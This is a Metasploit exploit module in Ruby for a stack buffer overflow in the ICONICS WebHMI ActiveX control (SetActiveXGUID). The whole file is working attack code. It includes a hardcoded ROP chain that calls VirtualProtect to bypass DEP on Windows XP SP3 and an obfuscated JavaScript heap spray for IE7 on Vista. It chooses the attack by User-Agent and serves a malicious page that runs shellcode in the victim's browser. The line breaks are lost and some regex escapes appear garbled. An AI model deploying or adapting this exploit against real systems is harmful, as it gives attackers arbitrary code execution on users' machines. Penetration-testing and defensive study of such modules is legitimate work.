### $Id: iconics_webhmi_setactivexguid.rb 12584 2011-05-11 20:45:54Z sinn3r $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/##require 'msf/core'class Metasploit3 < Msf::Exploit::Remote	Rank = GoodRanking	include Msf::Exploit::Remote::HttpServer::HTML	def initialize(info={})		super(update_info(info,			'Name'           => "ICONICS WebHMI ActiveX Buffer Overflow",			'Description'    => %q{					This module exploits a vulnerability found in ICONICS WebHMI's ActiveX control.				By supplying a long string of data to the 'SetActiveXGUID' parameter, GenVersion.dll				fails to do any proper bounds checking before this input is copied onto the stack,				which causes a buffer overflow, and results arbitrary code execution under the context				of the user.			},			'License'        => MSF_LICENSE,			'Version'        => "$Revision: 12584 $",			'Author'         =>				[					'Scoot Bell <scott.bell[at]security-assessment.com>',					'Blair Strang <blair.strang[at]security-assessment.com>',					'sinn3r',  #Metasploit port				],			'References'     =>				[					['OSVDB', '72135'],					['URL', 'http://www.security-assessment.com/files/documents/advisory/ICONICS_WebHMI.pdf'],					['URL', 'http://www.exploit-db.com/exploits/17240/'],				],			'Payload'        =>				{					'BadChars'         => "/x00",					'StackAdjustment'  => -3500,				},			'DefaultOptions'  =>				{					'ExitFunction'         => "seh",					'InitialAutoRunScript' => 'migrate -f',				},			'Platform'       => 'win',			'Targets'        =>				[					[						'Automatic', {}					],					[						'IE 6/7/8 on Windows XP SP3',						{							'Offset'       => 510,         #Offset to where ROP gadgets begin							'Ret'          => 0x770167b0,  #PUSH ESP; POP EBP; RETN 8							'Max'          => 4500,        #Max buffer size used						},					],					[						'IE 7 on Windows Vista',						{							'Ret'          => 0x0c0c0c0c,  #Target spray							'blockSize'    => "0x1000",							'spraySize'    => "0x8500",							'Max'          => 4500,						},					],				],			'Privileged'     => false,			'DisclosureDate' => "May 5 2011",			'DefaultTarget'  => 0))	end	def junk		return rand_text(4).unpack("L")[0].to_i	end	def repeat(addr, rep)		arr = []		rep.times { arr << addr }		return arr	end	def on_request_uri(cli, request)		my_target = ''		agent = request.headers['User-Agent']		if agent =~ /NT 5/.1/ and agent =~ /MSIE (6|7)/./d/			my_target = targets[2]		elsif agent =~ /NT 6/.0/ and agent =~ /MSIE 7/./d/			my_target = targets[2]		elsif agent =~ /NT 5/.1/ and agent =~ /MSIE 8/.0/			my_target = targets[1]		else			send_not_found(cli)			print_error("#{cli.peerhost}:#{cli.peerport} Unknown User-Agent")			return		end		js = ''		sploit = ''		if my_target['spraySize'] == nil			#ROP tekniq is only used against IE 8 + XP SP3 (ENG), since the gadgets are specific			#to the service pack (non or fully patched)			rop_gadgets = [				my_target.ret,				junk,				0x7e45c67f,              #XCHG EAX,EBP; RETN (USER32.dll)				repeat(junk, 2),				0x7e440639,              #ADD ESP,10; POP EDI; POP ESI; POP EBX; RETN USER32.dll				0x7c801ad4,              #Kernel32.VirtualProtect				junk,                    #Initial ESP + 8 p1 = retaddr				junk,                    #p2 - lpaddr				junk,                    #p3 - size				junk,                    #p4 - perms				junk,                    #p5 - oldperms				junk,				#Return address				0x7e4462ed,              #XCHG EAX,ECX; RETN (USER32.dll)				0x7c902b50,              #MOV EDX, ECX; RETN (ntdll.dll)				repeat(0x77aa2d96, 20),  #INC ECX * 21 (CRYPT32.dll)				0x7c901726,              #MOV EAX, EDX; RETN (ntdll.dll)				repeat(0x5b86a17b, 2),   #ADD EAX,7B; RETN * 2 (NETAPI32.dll)				repeat(0x77c34fbd, 2),   #ADD EAX,5C; RETN * 2 (msvcrt.dll)				0x7E76EA74,              #MOV DWORD PTR DS:[ECX],EAX; RETN (SXS.dll)				#Shellcode pointer				repeat(0x77aa2d96, 4),   #INC ECX * 4 (CRYPT32.dll)				0x7E76EA74,              #MOV DWORD PTR DS:[ECX],EAX; RETN (SXS.dll)				#Size  (0x400 bytes)				repeat(0x77aa2d96, 4),   #INC ECX * 4 (CRYPT32.dll)				0x7e721a99,              #POP EAX; RETN (SXS.dll)				0x3BFFF9CB,              #Value to XOR				0x7e7560b5,              #XOR EAX,3bfffdcb (SXS.dll)				0x7E76EA74,              #MOV DWORD PTR DS:[ECX],EAX; RETN (RPCRT4.dll)				#NewProtect				repeat(0x77aa2d96, 4),   #INC ECX * 4 (CRYPT32.dll)				0x7E456160,              #XOR EAX,EAX; RETN (USER32.dll)				0x7E4193BA,              #ADD AL,3B (USER32.dll)				repeat(0x7E442074, 5),   #INC EAX; RETN (USER32.dll)				0x7E76EA74,              #MOV DWORD PTR DS:[ECX],EAX; RETN (USER32.dll)				#OldProtect				repeat(0x77aa2d96, 4),   #INC ECX * 4 (CRYPT32.dll)				0x7e721a99,              #POP EAX (SXS.dll)				0x10010570,              #EAX (Wriable memory)				0x7E76EA74,              #MOV DWORD PTR DS:[ECX],EAX; RETN (USER32.dll)				#Call VirtualProtect				repeat(0x7E421AAF, 20),  #DEC ECX; RETN (USER32.dll)				0x7E4462ED,              #XCHG EAX,ECX; RETN (USER32.dll)				0x7E45F257,              #XCHG EAX,ESP; RETN (USER32.dll)				repeat(junk, 2),         #Align shellcode				].flatten.pack('V*')				sploit << Rex::Text.to_unescape(rand_text_alpha(my_target['Offset']), Rex::Arch.endian(target.arch))				sploit << Rex::Text.to_unescape(rop_gadgets, Rex::Arch.endian(target.arch))				sploit << Rex::Text.to_unescape(make_nops(80), Rex::Arch.endian(target.arch))				sploit << Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))				sploit << rand_text_alpha(my_target['Max']-sploit.length)		else			#If we don't have to ROP, then we just spray against the rest of the targets			shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))			target_ret = [my_target.ret].pack('V')			nops = Rex::Text.to_unescape(target_ret*4, Rex::Arch.endian(target.arch))			sploit << Rex::Text.to_unescape(target_ret * (my_target['Max'] / 4), Rex::Arch.endian(target.arch))			js_func_name        = rand_text_alpha(rand(6) + 3)			js_var_blocks_name  = rand_text_alpha(rand(6) + 3)			js_var_shell_name   = rand_text_alpha(rand(6) + 3)			js_var_nopsled_name = rand_text_alpha(rand(6) + 3)			js_var_index_name   = rand_text_alpha(rand(6) + 3)			js = <<-EOS			<script>			function #{js_func_name}() {				var #{js_var_blocks_name} = new Array();				var #{js_var_shell_name} = unescape("#{shellcode}");				var #{js_var_nopsled_name} = unescape("#{nops}");				while (#{js_var_nopsled_name}.length < #{my_target['blockSize']}) { #{js_var_nopsled_name} += #{js_var_nopsled_name} };				for (var #{js_var_index_name}=0; #{js_var_index_name} < #{my_target['spraySize']}; #{js_var_index_name}++) {					#{js_var_blocks_name}[#{js_var_index_name}] = [ "" + #{js_var_nopsled_name} + #{js_var_shell_name} ].join("");				}			}			#{js_func_name}();			</script>			EOS		end		obj_id      = rand_text_alpha(rand(6) + 3)		sploit_name = rand_text_alpha(rand(6) + 3)		html = <<-EOS		<html>		<head>#{js}</head>		<body>		<object classid="clsid:D25FCAFC-F795-4609-89BB-5F78B4ACAF2C" id="#{obj_id}"></object>		<script>		var #{sploit_name} = unescape("#{sploit}");		#{obj_id}.SetActiveXGUID(#{sploit_name});		</script>		</body>		</html>		EOS		html = html.gsub(/^/t/t/, "")		print_status("Sending malicious page to #{cli.peerhost}:#{cli.peerport}...")		send_response(cli, html, {'Content-Type'=>'text/html'})	endend